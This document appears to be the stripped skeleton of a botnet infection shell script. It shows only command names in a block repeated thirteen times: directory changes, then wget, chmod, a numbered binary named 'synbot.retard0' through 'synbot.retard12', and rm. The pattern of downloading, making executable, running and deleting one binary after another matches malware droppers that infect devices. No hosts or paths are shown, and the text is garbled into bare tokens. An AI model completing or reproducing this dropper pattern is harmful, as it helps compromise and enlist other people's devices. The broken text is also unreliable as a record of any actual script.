cd
cd
cd
cd
cd
wget
chmod
synbot.retard0
rm
cd
cd
cd
cd
cd
wget
chmod
synbot.retard1
rm
cd
cd
cd
cd
cd
wget
chmod
synbot.retard2
rm
cd
cd
cd
cd
cd
wget
chmod
synbot.retard3
rm
cd
cd
cd
cd
cd
wget
chmod
synbot.retard4
rm
cd
cd
cd
cd
cd
wget
chmod
synbot.retard5
rm
cd
cd
cd
cd
cd
wget
chmod
synbot.retard6
rm
cd
cd
cd
cd
cd
wget
chmod
synbot.retard7
rm
cd
cd
cd
cd
cd
wget
chmod
synbot.retard8
rm
cd
cd
cd
cd
cd
wget
chmod
synbot.retard9
rm
cd
cd
cd
cd
cd
wget
chmod
synbot.retard10
rm
cd
cd
cd
cd
cd
wget
chmod
synbot.retard11
rm
cd
cd
cd
cd
cd
wget
chmod
synbot.retard12
rm
